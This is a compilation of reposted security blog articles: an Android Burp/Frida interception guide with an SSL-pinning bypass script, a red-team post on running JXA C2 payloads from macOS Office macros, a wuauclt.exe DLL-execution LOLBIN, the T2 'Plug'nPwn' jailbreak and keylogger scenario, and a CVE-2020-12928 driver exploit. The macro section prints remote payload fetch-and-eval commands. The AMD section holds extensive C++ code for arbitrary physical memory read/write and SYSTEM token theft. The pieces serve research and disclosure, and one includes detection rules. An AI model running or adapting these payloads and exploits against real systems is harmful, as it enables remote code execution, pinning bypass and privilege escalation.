Android Security Testing: Setting up burp suite with Android VM/physical device

Android Security Testing: Setting up burp suite with Android VM/physical device

Original test by Sarvesh Sharma

Setting up the Burp suite with an android device is simple but a little tricky.

There are several ways to set up this environment.
1. Setting up Burp suite with Android VM (Needs Genymotion with virtual box).
2. Setting up Burp suite with Android physical Device (Needs Rooted android device).

Setting up Burp suite with Android VM (Needs Genymotion with virtual box) or with Android physical device.

Follow the below-mentioned steps:
Prerequisite:
i. Burp suite.
ii. Genymotion (With virtual box.).

or

ii. Android device (Rooted.).
iii. adb tools. Click here to download.
iv. Setting up proxy and Certificate in Android VM/device.
v. Frida installed in host PC and Frida server file to run Frida from the Android device. (python installed in the host machine.(PC/laptop))

i. Burp Suite.

Step 1: Certificate export: Open Burp Suite. Go to Proxy → Options → Proxy Listener → click on import/ export CA certificate. → At the export choose Certificate in DER format.(eg. cacert.der) → Click on next → select any file name having extension as .der → Click on next.

Image for post
Burp Certificate export

Step 2: Go to the folder where you saved the Burp CA certificate. → Change the extension from .der to .crt (eg. cacert.crt)→ and save it.

Step 3: Proxy setting in burp: Go to Proxy → Options → Proxy Listener → Click on add → Select specific address and then select IP of the device where burp is running or Simply select All interfaces (It will intercept traffic all the traffic going through your system.). → Enable this config.

Image for post
Burp Proxy setting

ii. Genymotion (With virtual box.).

Step 1: Installing Genymotion: Download Genymotion (Please select with the virtual box) from Click here to download. → Register with Genymotion → Login → Click on Add icon to add a new Virtual Device. → Select Android API according to Android version → select Device from the list → Click on Next. (Recommended device and settings are in the attached screenshots.)

Image for post
Genymotion Download
Image for post
VM device select
Image for post
VM device settings

Step 3: Install Open Gapps/Google Play Services:

  1. Power on the VM device.
  2. Click on Open Gapps icon on side bar. Follow the steps and it will automatically download and install Gapps in your VM device.

or

ii. Android Physical Device.

Note: We need an android device having Android OS version 6.0 or newer. Along with this we need to root the device (there are different ways to root the device, flashing Magisk is one of the popular and recommended way to root an android device.).

Step 1: Just plug in the android device with USB cable into the system where want to capture the traffic.

iii. ADB tools. Click here to download.:

you can download ABD tools from Click hereIt will redirect to a page where you can select the ADB tools package according to your host machine. Select “sdk for winodws/mac/linux”. and then select the required terms and download. extract the tools at any location.(at this location you need to navigate in cmd/terminal when need to use ADB tools). ADB tools are useful while doing the out of the box stuff on Android, like direct installing an app in device from your laptop/pc or pushing any file directly to any location. (We will see the use of ADB in the upcoming steps.)

To globally install ADB tools: go to start in windows → search for “edit the system environment variables”. → open it → in advance tab → Environment variables → select and edit PATH in system variables → Click on New → paste the path of ADB tools directory (where you extracted, Downloaded ADB tools zip.).

iv. Setting up proxy and Certificate in Android VM/device.

Step 1: Setting up the proxy in Android: Power on the Android device/Android VM from Genymotion (If it shows IP related error at bootup, then go to virtual box start the device listed there and power off after it gets an IP.) → Go to Settings → go to WIFI → Hold on Wifi name listed there and select Modify Network. → Select proxy as Manual → Input Hostname as you Host machine’s IP/Port which was used to set as proxy listener at Burp proxy setting → Save.

Image for post
Setup Proxy in android

Step 2: Setting up the burp Certificate in Android:

Open cmd/terminal. Move to the directory where ADB tools are present.

Push burp certificate to the android device: There are two ways to add a certificate in the Android device.
i. Adding a Certificate into user-defined certificates.: (Recommanded) push burp certificate (having extension as .crt) using the command

"adb push path_to_certificate /sdcard/Download/".

Switch to android device → Go to settings → Security → install from Sdcard → Select the certificate from Download folder → it will ask to enter a name, Enter any name here (eg. Burp CA). → It will ask to add PIN security. → Enter the security Pin. → Next.

ii. Adding a Certificate into system-defined certificates.: Download and install OpenSSL form Click here. → open cmd and run command
"openssl x509 -inform DER -in path_to_certificate/cacert.der -out path_to_certificate/cacert.pem"
then run.
"openssl x509 -inform PEM -subject_hash_old -in cacert.pem"
it will show as hash value copy it save it for further use.
then run .
"mv path_to_certificate/cacert.pem path_to_certificate/<hash>.0" or simply rename the file cacert.pem as <hash_value>.0
Now copy the certificate tot the device. here is the list of commands to execute.
"adb remount" →
"adb push <hash_value>.0 /sdcard/Download" →
"adb shell" →
"mv /sdcard/Download/<hash_value>.0 /system/etc/security/cacerts/" →
"chmod 644 /system/etc/security/cacerts/<hash_value>.0"

Note: The benefit of adding a burp certificate into system-defined certificates is, we don’t need to follow step V. which is Frida setup. (But it’s not a recommended way because sometimes it misses some API calls.)
Reference: https://enderspub.kubertu.com/burp-suite-ssl-pinning

V. Frida installation in host PC and running frida server from Android device.

Step 1: Installation Frida in the host PC: run command to install Frida in host pc “pip install frida-tools«.

Step 2: Running Frida from android device:

  1. run command “adb shell getprop ro.product.cpu.abi» to know the processor architecture. →
  2. download the Frida server file from Click here. (Select your file according to the processor architecture if arm than arm file and if it is x86 than select x86 file.) →
  3. extract tile xz file → copy the file which is present in the extracted folder to the android device via the command “adb push ./frida-server-12.x.y-android-xyz /data/local/tmp/» →
  4. Now disable SELinux (This is one time process.): “adb shell» → in the shell: «su» → «setenforce 0«.
  5. Start Frida server by command: “adb shell» → «/data/local/tmp/frida-server-12.x.y-android-xyz &«

Step 3: Creating js file to do SSL pinning.: This needs to fix certificate-related errors and capture traffic in Burp suite.
create a js file named frida-ssl-pin.jsAnd paste the following content in it and save the file.

Java.perform(function() {

var array_list = Java.use(“java.util.ArrayList”);
var ApiClient = Java.use(‘com.android.org.conscrypt.TrustManagerImpl’);

ApiClient.checkTrustedRecursive.implementation = function(a1, a2, a3, a4, a5, a6) {
// console.log(‘Bypassing SSL Pinning’);
var k = array_list.$new();
return k;
}

}, 0);

Step 4: Running the Frida receiver/client from the host machine.:

  1. Open the app in android device. now find the process name by running the command from cmd: “frida-ps -U«. and copy the process name.
  2. run Frida receiver/client by running the command: “frida -U -l path_to_js_file/frida-ssl-2.js --no-paus -f com.example.application«. This will open the app again.. and now you are ready to capture traffic in Burp Suite.

Special Notes:

  1. Whenever the device restarts, We need to repeat the steps of running the Frida server from the android device.
  2. In the case mentioned in point 1, we need to start the Frida receiver/client in the host machine also.

Please let me know in case of any query….

Running JXA Payloads from macOS Office Macros

Running JXA Payloads from macOS Office Macros

Original text by Cedric Owens

Despite being quite antiquated, MS Office macros continue to be used by red teams (and attackers) due to the fact that they are easy to craft and they still work (and on the macOS side of the house, they often go undetected without building custom content). I have written MS Office macros for a couple different macOS C2 tools in the past…and in both I used python as the means of running the C2 payload:

With the landscape starting to shift in the macOS arena to moving away from python-based offensive tooling, I thought I would take a look at how to write macros for macOS without using python. Below I walk through that process.

I tried a few things to see what would and would not execute in the macOS app sandbox (where anything spawned by an MS Office macro is executed). I found that several utilities I wanted to use were not able to execute in the sandbox (I tested the items below from VBA execution using MacScript (“do shell script ….”)):

  • I tried using osascript to launch a JXA javascript file: osascript -l JavaScript -e “eval(ObjC.unwrap($.NSString.alloc.initWithDataEncoding($.NSData.dataWithContentsOfURL($.NSURL.URLWithString(‘[url_to_jxa_js_file]’)),$.NSUTF8StringEncoding)));” — → osascript is permitted in the app sandbox, but not the -l JavaScript option during my testing
  • I tried building Objective C code on the fly, compiling, and executing via the command line: echo “#import <Foundation/Foundation.h>\n#import <AppKit/AppKit.h>\n#import <OSAKit/OSAKit.h>\n#include <pthread.h>\n#include <assert.h>\n\nint main(int argc, const char * argv[]) {\n\t@autoreleasepool {\n\t\tNSString *encString = @\”eval(ObjC.unwrap($.NSString.alloc.initWithDataEncoding($.NSData.dataWithContentsOfURL($.NSURL.URLWithString(‘[JXApayloadURL]‘)),$.NSUTF8StringEncoding)));\»;\n\t\tOSALanguage *lang = [OSALanguage languageForName:@\”JavaScript\”];\n\t\tOSAScript *script = [[OSAScript alloc] initWithSource:encString language:lang];\n\t\tNSDictionary *__autoreleasing compileError;\n\t\tNSDictionary *__autoreleasing runError;\n\t\t[script compileAndReturnError:&compileError];\n\t\tNSAppleEventDescriptor* res = [script executeAndReturnError:&runError];\n\t\tBOOL didSucceed = (res != nil);\n\t}\n\treturn 0;\n}” >> jxa.m && clang -fmodules jxa.m -o jxa && ./jxa — → clang (as well as gcc) were not permitted to be executed in the sandbox during my testing
  • Next I went very simple and just tried to invoke curl to download a hosted JXA .js payload and to invoke that payload via osascript…THAT DID WORK:
Image for post
JXA payload downloaded and run
Image for post
Mythic payload executed

Note: There is nothing really advanced or complex in the code above. Since these command line binaries were allowed in the app Sandbox, this made for an easy way to perform this action without using python.

Here is my github repo with the macro generator code to produce VBA code with content similar to above:

https://github.com/cedowens/Mythic-Macro-Generator

In my testing I used Mythic’s apfell http JXA .js payloads:

https://github.com/its-a-feature/Mythic

What is neat about Mythic is even though this method will launch the Mythic agent inside of the app sandbox, Mythic is still able to execute some functions outside of the sandbox due to how it is invoking ObjC calls to perform those functions.

Detection

Since my macro generator produces code that relies on the command line, detections are pretty straightforward. I ran Patrick Wardle’s ProcessMonitor tool (which uses the Endpoint Security Framework) in order to capture events when I launched the macro and connected to Mythic. Here is a screenshot of the capture:

Image for post

In summary, parent-child detections can be used to detect this macro:

  • Office Product (ex: Microsoft Word.app) → /bin/sh
  • Office Product (ex: Microsoft Word.app) → /bin/bash
  • Office Product (ex: Microsoft Word.app) → /usr/bin/curl

I recommend blue teams roll out the detections above, as there should be little to no valid activity stemming from the above parent-child relationships.

Code execution via the Windows Update client (wuauclt)

Code execution via the Windows Update client (wuauclt)

Original text by DTM

Code execution via the Windows Update client (wuauclt)

Its been a few months since my last post about uploading and downloading data with certreq.exe as a potential alternative to certutil.exe in LOLBIN land. I’ve been having a blast starting my new role in the MDSec ActiveBreach team.

Today I wanted to share something a little more juicy. Enter the ‘WSUS Useful Client’ as they describe here. The Windows Update client (wuauclt.exe) is a bit elusive with only small number of Microsoft articles about it [1] [2] and these articles do not seem to document all of the available command line options.

This binary lives here:

C:\Windows\System32\wuauclt.exe

I discovered (When I get a chance I will be sharing further details of the methodology I used to find this on a blog post @MDSecLabs) you can gain code execution by specifying an arbitrary DLL with the following command line options on the test Windows 10 systems I tried:

wuauclt.exe /UpdateDeploymentProvider <Full_Path_To_DLL> /RunHandlerComServer

There’s some fantastic work already in the community for raising the awareness of LOLBINs and for sharing new candidates and their capabilities with the excellent LOLBAS project. I have made the following pull request to this project:

https://github.com/LOLBAS-Project/LOLBAS/pull/99

After discovering this LOLBIN independently some brief searching highlighted a sample on Joe Sandbox leveraging it in the wild:

https://www.joesandbox.com/analysis/215088/0/html

Finally, come and hang out at the RedTeamSec Discord here. It’s been great to see this community grow over the past few months, with some great content being shared.

Plug’nPwn — Connect to Jailbreak

Original text by T2

Plug'nPwn - Connect to Jailbreak
State of the World: checkm8checkra1n and the T2
For those just joining us, news broke last week about the jailbreaking of Apple’s T2 security processor in recent Macs. If you haven’t read it yet, you can catch up on the story here, and try this out yourself at home using the latest build of checkra1n. So far we’ve stated that you must put the computer into DFU before you can run checkra1n to jailbreak the T2 and that remains true, however today we are introducing a demo of replacing a target Mac’s EFI and releasing details on the T2 debug interface.
A Monkey by any Other Name
In order to build their products unlike app developers Apple has to debug the core operating system. This is how firmware, the kernel and the debugger itself are built and debugged. From the earliest days of the iPod, Apple has built specialized debug probes for building their products. These devices are leaked from Apple headquarters and their factories and have traditionally had monkey related names such as the “Kong”, “Kanzi” and “Chimp”. They work by allowing access to special debug pins of the CPU, (which for ARM devices is called Serial Wire Debug or SWD), as well as other chips via JTAG and UART. JTAG is a powerful protocol allowing direct access to the components of a device and access generally provides the ability to circumvent most security measures. Apple has even spoken about their debug capabilities in a BlackHat talk describing the security measures in effect. Apple has even deployed versions of these to their retail locations allowing for repair of their iPads and Macs.
The Bonobo in the Myst
Another hardware hacker and security researcher Ramtin Amin did work last year to create an effective clone of the Kanzi cable. This combined with the checkm8 vulnerability from axi0mX allows iPhones 5s — X to be debugged.
The USB port on the Mac
One of the interesting questions is how does the Macs share a USB port with both the Intel CPU (macOS) and the T2 (bridgeOS) for DFU.  These are essentially separate computers inside of the case sharing the same pins.  Schematics of the MacBook leaked from Apple’s vendors (a quick search with a part number and “schematic”), and analysis of the USB-C firmware update payload show that there is a component on each port which is tasked with both multiplexing (allowing the port to be shared) as well as terminating USB power delivery (USB-PD) for the charging of the MacBook or connected devices.  Further analysis shows that this port is shared between the following:

The Thunderbolt controller which allows the port to be used by macOS as Thunderbolt, USB3 or DisplayPort
The T2 USB host for DFU recovery
Various UART serial lines
The debug pins of the T2
The debug pins of the Intel CPU for debugging EFI and the kernel of macOS

Like the above documentation related to the iPhone, the debug lanes of a Mac are only available if enabled via the T2.  Prior to the checkm8 bug this required a specially signed payload from Apple, meaning that Apple has a skeleton key to debug any device including production machines.  Thanks to checkm8, any T2 can be demoted, and the debug functionality can be enabled.  Unfortunately Intel has placed large amounts of information about the Thunderbolt controllers and protocol under NDA, meaning that it has not been properly researched leading to a string of vulnerabilities over the years.
The USB-C Plug and USB-PD

Given that the USB-C port on the Mac does many things, it is necessary to indicate to the multiplexer what device inside the Mac you’d like to connect too.  The USB-C port specification provides pins for this exact purpose (CC1/CC2) as well as detecting the orientation of the cable allowing for it to be reversible.  On top of the CC pins runs another low speed protocol called USB-PD or USB power delivery.  It is primarily used to negotiate power requirements between chargers(sources) and devices (sinks).  USB-PD also allows for arbitrary packets of information in what are called “Vendor Defined Messages” or VDMs.

Apple’s USB-PD Extensions
The VDM allows Apple to trigger actions and specify the target of a USB-C connection.  We have discovered USB-PD payloads that cause the T2 to be rebooted and for the T2 to be held into a DFU state.  Putting these two actions together, we can cause the T2 to restart ready to be jailbroken by checkra1n without any user interaction.  While we haven’t tested a Apple Serial Number Reader, we suspect it works in a similar fashion, allowing the devices ECID and Serial Number to be read from the T2’s DFU reliably.  The Mac also speaks USB-PD to other devices, such as when an iPad Pro is connected in DFU mode.  
Apple needs to document the entire set of VDM messages used in their products so that consumers can understand the security risks.  The set of commands we issue are unauthenticated, and even if they were they were undocumented and thus un-reviewed.  Apple could have prevented this scenario by requiring that some physical attestation occurs during these VDMs such as holding down the power button at the same time.

Putting it Together
Taking all this information into account, we can string it together to reflect a real world attack.  By creating a specialized device about the size of a power charger, we can place a T2 into DFU mode, run checkra1n, replace the EFI and upload a key logger to capture all keys.  This is possible even though macOS is un-altered (the logo at boot is for effect but need not be done).  This is because in Mac portables the keyboard is directly connected to the T2 and passed through to macOS.

VIDEO DEMO
PlugNPwn is the entry into DFU directly from connecting a cable to the DFU port (if it doesn’t show, it may be your AdBlock: https://youtu.be/LRoTr0HQP1U)

PlugN’Pwn Automatic Jailbreak
In the next video we use checkra1n to modify the MacEFI payload for the Intel processor (again, AdBlock may cause it not to show https://youtu.be/uDSPlpEP-T0)

USB-C Debug Probe

In order to facilitate further research on the topic of USB-PD security, and to allow users at home to perform similar experiments we are pleased to announce pre-ordereing of our USB-PD screamer.  It allows a computer to directly «speak» USB-PD to a target device.  Get more info here:

[PRE-SALE] USB-PD Screamer

[PRE-SALE] USB-PD Screamer

$49.99

This miniature USB-to-Power Delivery adapter lets you experiment with USB Power Deliver protocol and discover hidden functionality in various Type-C devices.

Capabilities you might discover include but are not limited to serial ports, debug ports (SWD, JTAG, etc.), automatic restart, automatic entry to firmware update boot-loader.

Tested to work with Apple Type-C devices such as iPad Pro and MacBook (T1 and T2) to expose all functionality listed above (SWD does not work on iPad because no downgrade is available).

WARNING! This probe is NOT an SWD/Serial probe by itself. It only allows you to send needed PD packets to mux SWD/Serial out and exposes it on the test pads. If you want to use SWD/Serial, you WILL need another SWD/Serial probe/adapter upstream connected to the test pads.

ABSOLUTELY NOT for experiments with 9/15/20v or anything other than 5v.

Only for arbitrary PD messages.

Dimensions: 10x15mm (excluding type-c plug)

Connectivity: USB to control custom PD messages, test points for USB-Top, USB-Bottom, and SBU lines for connection to upstream devices to utilize the exposed functionality.

CVE-2020-12928 Exploit Proof-of-Concept, Privilege Escalation in AMD Ryzen Master AMDRyzenMasterDriver.sys

CVE-2020-12928 Exploit Proof-of-Concept, Privilege Escalation in AMD Ryzen Master AMDRyzenMasterDriver.sys

Original text by h0mbre

Background

Earlier this year I was really focused on Windows exploit development and was working through the FuzzySecurity exploit development tutorials on the HackSysExtremeVulnerableDriver to try and learn and eventually went bug hunting on my own.

I ended up discovering what could be described as a logic bug in the ATI Technologies Inc. driver ‘atillk64.sys’. Being new to the Windows driver bug hunting space, I didn’t realize that this driver had already been analyzed and classified as vulnerable by Jesse Michael and his colleague Mickey in their ‘Screwed Drivers’github repo. It had also been mentioned in several other places that have been pointed out to me since.

So I didn’t really feel like I had discovered my first real bug and decided to hunt similar bugs on Windows 3rd party drivers until I found my own in the AMD Ryzen Master AMDRyzenMasterDriver.sys version 15.

I have since stopped looking for these types of bugs as I believe they wouldn’t really help me progress skills wise and my goals have changed since.

Thanks

Huge thanks to the following people for being so charitable, publishing things, messaging me back, encouraging me, and helping me along the way:

AMD Ryzen Master

The AMD Ryzen Master Utility is a tool for CPU overclocking. The software purportedly supports a growing list of processors and allows users fine-grained control over the performance settings of their CPU. You can read about it here

AMD has published an advisory on their Product Security page for this vulnerability.

Vulnerability Analysis Overview

This vulnerability is extremely similar to my last Windows driver post, so please give that a once-over if this one lacks any depth and leaves you curious. I will try my best to limit the redudancy with the previous post.

All of my analysis was performed on Windows 10 Build 18362.19h1_release.190318-1202.

I picked this driver as a target because it is common of 3rd-party Windows drivers responsible for hardware configurations or diagnostics to make available to low-privileged users powerful routines that directly read from or write to physical memory.

Checking Permissions

The first thing I did after installing AMD Ryzen Master using the default installer was to locate the driver in OSR’s Device Tree utility and check its permissions. This is the first thing I was checking during this period because I had read that Microsoft did not consider a violation of the security boundary between Administrator and SYSTEM to be a serious violation. I wanted to ensure that my targets were all accessible from lower privileged users and groups.

Luckily for me, Device Tree indicated that the driver allowed all Authenticated Users to read and modify the driver.

Finding Interesting IOCTL Routines

Write What Where Routine

Next, I started looking at the driver in in a free version of IDA. A search for MmMapIoSpace returned quite a few places in which the api was cross referenced. I just began going down the list to see what code paths could reach these calls.

The first result, sub_140007278, looked very interesting to me.

We don’t know at this point if we control the API parameters in this routine but looking at the routine statically you can see that we make our call to MmMapIoSpace, it stores the returned pointer value in [rsp+48h+BaseAddress] and does a check to make sure the return value was not NULL. If we have a valid pointer, we then progress into this loop routine on the bottom left.

At the start of the looping routine, we can see that eax gets the value of dword ptr [rsp+48h+NumberOfBytes] and then we compare eax to [rsp+48h+var_24]. This makes some sense because we already know from looking at the API call that [rsp+48h+NumberOfBytes] held the NumberOfBytes parameter for MmMapIoSpace. So essentially what this is looking like is, a check to see if a counter variable has reached our NumberOfBytes value. A quick highlight of eax shows that later it takes on the value of [rsp+48h+var_24], is incremented, and then eax is put back into [rsp+48h+var_24]. Then we’re back at the top of our loop where eax is set equal to NumberOfBytes before every check.

So this to me looked interesting, we can see that we’re doing something in a loop, byte by byte, until our NumberOfBytes value is reached. Once that value is reached, we see the other branch in our loop when our NumberOfBytes value is reached is a call to MmUnmapIoSpace.

Looking a bit closer at the loop, we can see a few interesting things. ecx is essentially a counter here as its set equal to our already mentioned counters eax and [rsp+48h+var_24]. We also see there is a mov to [rdx+rcx] from al. A single byte is written to the location of rdx + rcx. So we can make a guess that rdx is a base address and rcx is an offset. This is what a traditional for loop would seem to look like disassembled. al is taken from another similar construction in [r8+rax] where rax is now acting as the offset and r8 is a different base address.

So all in all, I decided this looks like a routine that is either doing a byte by byte read or a byte by byte write to kernel memory most likely. But if you look closely, you can see that the pointer returned from MmMapIoSpace is the one that al is written to (while tracking an offset) because it is eventually moved into rdx for the mov [rdx+rcx], al operation. This was exciting for me because if we can control the parameters of MmMapIoSpace, we will possibly be able to specify a physical memory address and offset and copy a user controlled buffer into that space once it is mapped into our process space. This is essentially a write what where primitive!

Looking at the first cross-reference to this routine, I started working my way back up the call graph until I was able to locate a probable IOCTL code.

After banging my head against my desk for hours trying to pass all of the checks to reach our glorious write what where routine, I was finally able to reach it and get a reliable BSOD. The checks were looking at the sizes of my input and output buffers supplied to my DeviceIoControl call. I was able to solve this by simply stringing together random length buffers of something like AAAAAAAABBBBBBBBCCCCCCCC etc, and seeing how the program would parse my input. Eventually I was able to figure out that the input buffer was structured as follows:

  • first 8 bytes of my input buffer would be the desired physical address you want mapped,
  • the next 4 bytes would represent the NumberOfBytes parameter,
  • and finally, and this is what took me the longest, the next 8 bytes were to be a pointer to the buffer you wanted to overwrite the mapped kernel memory with.

Very cool! We have control over all the MmMapIoSpace params except CacheType and we can specify what buffer to copy over!

This is progress, I was fairly certain at this point I had a write primitive; however, I wasn’t exactly sure what to do with it. At this point, I reasoned that if a routine existed to do a byte by byte write to a kernel buffer somewhere, I probably also had the ability to do a byte by byte read of a kernel buffer. So I set out to find my routine’s sibling, the read what where routine (if she existed).

Read What Where

Now I went back to the other cross references of MmMapIoSpace calls and eventually came upon this routine, sub_1400063D0.

You’d be forgiven if you think it looks just like the last routine we analyzed, I know I did and missed it initially; however, this routine differs in one major way. Instead of copying byte by byte out of our process space buffer and into a kernel buffer, we are copying byte by byte out of a kernel buffer and into our process space buffer. I will spare you the technical analysis here but it is essentially our other routine except only the source and destinations are reversed! This is our read what where primitive and I was able to back track a cross reference in IDA to this IOCTL.

There were a lot of rabbit holes here to go down but eventually this one ended up being straightforward once I found a clear cut code path to the routine from the IOCTL call graph.

Once again, we control the important MmMapIoSpace parameters and, this is a difference from the other IOCTL, the byte by byte transfer occurs in our DeviceIoControl output buffer argument at an offset of 0xC bytes. So we can tell the driver to read physical memory from an arbitrary address, for an arbitrary length, and send us the results!

With these two powerful primitives, I tried to recreate my previous exploitation strategy employed in my last post.

Exploitation

Here I will try to walk through some code snippets and explain my thinking. Apologies for any programming mistakes in this PoC code; however, it works reliably on all the testing I performed (and it worked well enough for AMD to patch the driver.)

First, we’ll need to understand what I’m fishing for here. As I explained in my previous post, I tried to employ the same strategy that @b33f did with his driver exploit and fish for "Proc" tags in the kernel pool memory. Please refer to that post for any questions here. The TL;DR here is that information about processes are stored in the EPROCESS structure in the kernel and some of the important members for our purposes are:

  • ImageFileName (this is the name of the process)
  • UniqueProcessId (the PID)
  • Token (this is a security token value)

The offsets from the beginning of the structure to these members was as follows on my build:

  • 0x2e8 to the UniqueProcessId
  • 0x360 to the Token
  • 0x450 to the ImageFileName

You can see the offsets in WinDBG:

kd> !process 0 0 lsass.exe
PROCESS ffffd48ca64e7180
    SessionId: 0  Cid: 0260    Peb: 63d241d000  ParentCid: 01f0
    DirBase: 1c299b002  ObjectTable: ffffe60f220f2580  HandleCount: 1155.
    Image: lsass.exe

kd> dt nt!_EPROCESS ffffd48ca64e7180 UniqueProcessId Token ImageFilename
   +0x2e8 UniqueProcessId : 0x00000000`00000260 Void
   +0x360 Token           : _EX_FAST_REF
   +0x450 ImageFileName   : [15]  "lsass.exe"

Each data structure in the kernel pool has various headers, (thanks to ReWolf for breaking this down so well):

  • POOL_HEADER structure (this is where our "Proc" tag will reside),
  • OBJECT_HEADER_xxx_INFO structures,
  • OBJECT_HEADER which, contains a Body where the EPROCESS structure lives.

As b33f explains, in his write-up, all of the addresses where one begins looking for a "Proc" tag are 0x10 aligned, so every address here ends in a 0. We know that at some arbitrary address ending in 0, if we look at <address> + 0x4 that is where a "Proc" tag might be.

Leveraging Read What Where

The difficulty on my Windows build was that the length from my "Proc" tag once found, to the beginning of the EPROCESS structure where I know the offsets to the members I want varied wildly. So much so that in order to get the exploit working reliably, I just simply had to create my own data structure and store instances of them in a vector. The data structure was as follows:

struct PROC_DATA {
    std::vector<INT64> proc_address;
    std::vector<INT64> page_entry_offset;
    std::vector<INT64> header_size;
};

So as I’m using our Read What Where primitive to blow through all the RAM hunting for "Proc", if I find an instance of "Proc" I’ll iterate 0x10 bytes at a time until I find a marker signifying the end of our pool headers and the beginning of EPROCESS. This marker was 0x00B80003. So now, I’ll have the proc_address the literal place where "Proc" was and store that in PROC_DATA.proc_address, I’ll also annotate how far that address was from the nearest page-aligned memory address (a multiple of 0x1000) in PROC_DATA.proc_address and also annotate how far from "Proc" it was until we reached our marker or the beginning of EPROCESS in PROC.header_size. These will all be stored in a vector.

You can see this routine here:

INT64 results_begin = ((INT64)output_buff + 0xc);
        for (INT64 i = 0; i < 0xF60; i = i + 0x10) {

            PINT64 proc_ptr = (PINT64)(results_begin + 0x4 + i);
            INT32 proc_val = *(PINT32)proc_ptr;

            if (proc_val == 0x636f7250) {

                for (INT64 x = 0; x < 0xA0; x = x + 0x10) {

                    PINT64 header_ptr = PINT64(results_begin + i + x);
                    INT32 header_val = *(PINT32)header_ptr;

                    if (header_val == 0x00B80003) {

                        proc_count++;
                        cout << "\r[>] Proc chunks found: " << dec <<
                            proc_count << flush;

                        INT64 temp_addr = input_buff.start_address + i;

                        // This address might not be page-aligned to 0x1000
                        // so find out how far off from a multiple of 
                        // 0x1000 we are. This value is stored in our 
                        // PROC_DATA struct in the page_entry_offset
                        // member.
                        INT64 modulus = temp_addr % 0x1000;
                        proc_data.page_entry_offset.push_back(modulus);

                        // This is the page-aligned address where, either
                        // small or large paged memory will hold our "Proc"
                        // chunk. We store this as our proc_address member
                        // in PROC_DATA.
                        INT64 page_address = temp_addr - modulus;
                        proc_data.proc_address.push_back(
                            page_address);
                        proc_data.header_size.push_back(x);
                    }
                }
            }
        }

It will be more obvious with the entire exploit code, but what I’m doing here is basically starting from a physical address, and calling our read what where with a read size of 0x100c (0x1000 + 0xc as required so we can capture a whole page of memory and still keep our returned metadata information that starts at offset 0xc in our output buffer) in a loop all the while adding these discovered PROC_DATA structures to a vector. Once we hit our max address or max iterations, we’ll send this vector over to a second routine that parses out all the data we care about like the EPROCESS members we care about.

It is important to note that I took great care to make sure that all calls to MmMapIoSpace used page-aligned physical addresses as this is the most stable way to call the API

Now that I knew exactly how many "Proc" chunks I had found and stored all their relevant metadata in a vector, I could start a second routine that would use that metadata to check for their EPROCESS member values to see if they were processes I cared about.

My strategy here was to find the EPROCESS members for a privileged process such as lsass.exe and swap its security token with the security token of a cmd.exe process that I owned. You can see a portion of that code here:

INT64 results_begin = ((INT64)output_buff + 0xc);

        INT64 imagename_address = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x450; //ImageFileName
        INT64 imagename_value = *(PINT64)imagename_address;

        INT64 proc_token_addr = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x360; //Token
        INT64 proc_token = *(PINT64)proc_token_addr;

        INT64 pid_addr = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x2e8; //UniqueProcessId
        INT64 pid_value = *(PINT64)pid_addr;

        int sys_result = count(SYSTEM_procs.begin(), SYSTEM_procs.end(),
            imagename_value);

        if (sys_result != 0) {

            system_token_count++;
            system_tokens.token_name.push_back(imagename_value);
            system_tokens.token_value.push_back(proc_token);
        }

        if (imagename_value == 0x6578652e646d63) {
            //cout << "[>] cmd.exe found!\n";
            cmd_token_address = (start_address + proc_data.header_size[i] +
                proc_data.page_entry_offset[i] + 0x360);
        }
    }

    if (system_tokens.token_name.size() != 0 and cmd_token_address != 0) {
        cout << "\n[>] cmd.exe and SYSTEM token information found!\n";
        cout << "[>] Let's swap tokens!\n";
    }
    else if (cmd_token_address == 0) {
        cout << "[!] No cmd.exe token address found, exiting...\n";
        exit(1);
    }

So now at this point I had the location and values of every thing I cared about and it was time to leverage the Write What Where routine we had found.

Leveraging Write What Where

The problem I was facing was that I need my calls to MmMapIoSpace to be page-aligned so that the calls remain stable and we don’t get any unnecessary BSODs.

So let’s picture a page of memory as a line.

<—————–MEMORY PAGE—————–>

We can only write in page-size chunks; however, the value we want to overwrite, the value of the cmd.exe process’s Token, is most-likely not page-aligned. So now we have this:

<———TOKEN——————————->

I could do a direct write at the exact address of this Token value, but my call to MmMapIoSpace would not be page-aligned.

So what I did was one more Read What Where call to store everything on that page of memory in a buffer and then overwrite the cmd.exe Token with the lsass.exe Token and then use that buffer in my call to the Write What Where routine.

So instead of an 8 byte write to simply overwrite the value, I’d be opting to completely overwrite that entire page of memory but only changing 8 bytes, that way the calls to MmMapIoSpace stay clean.

You can see some of that math in the code snippet below with references to modulus. Remember that the Write What Where utilized the input buffer of DeviceIoControl as the buffer it would copy over into the kernel memory:

if (!DeviceIoControl(
        hFile,
        READ_IOCTL,
        &input_buff,
        0x40,
        output_buff,
        modulus + 0xc,
        &bytes_ret,
        NULL))
    {
        cout << "[!] Failed the read operation to copy the cmd.exe page...\n";
        cout << "[!] Last error: " << hex << GetLastError() << "\n";
        exit(1);
    }

    PBYTE results = (PBYTE)((INT64)output_buff + 0xc);

    PBYTE cmd_page_buff = (PBYTE)VirtualAlloc(
        NULL,
        modulus + 0x8,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);
   

    DWORD num_of_bytes = modulus + 0x8;

    INT64 start_address = cmd_token_address;
    cout << "[>] cmd.exe token located at: " << hex << start_address << "\n";
    INT64 new_token_val = system_tokens.token_value[0];
    cout << "[>] Overwriting token with value: " << hex << new_token_val << "\n";

    memcpy(cmd_page_buff, results, modulus);
    memcpy(cmd_page_buff + modulus, (void*)&new_token_val, 0x8);

    // PhysicalAddress
    // NumberOfBytes
    // Buffer to be copied into system space
    BYTE input[0x1000] = { 0 };
    memcpy(input, (void*)&cmd_page, 0x8);
    memcpy(input + 0x8, (void*)&num_of_bytes, 0x4);
    memcpy(input + 0xc, cmd_page_buff, modulus + 0x8);

    if (DeviceIoControl(
        hFile,
        WRITE_IOCTL,
        input,
        modulus + 0x8 + 0xc,
        NULL,
        0,
        &bytes_ret,
        NULL))
    {
        cout << "[>] Write operation succeeded, you should be nt authority/system\n";
    }
    else {
        cout << "[!] Write operation failed, exiting...\n";
        exit(1);
    }

Final Results

You can see the mandatory full exploit screenshot below:

Disclosure Timeline

Big thanks to Tod Beardsley at Rapid7 for his help with the disclosure process!

  • 1 May 2020: Vendor notified of vulnerability
  • 1 May 2020: Vendor acknowledges vulnerability
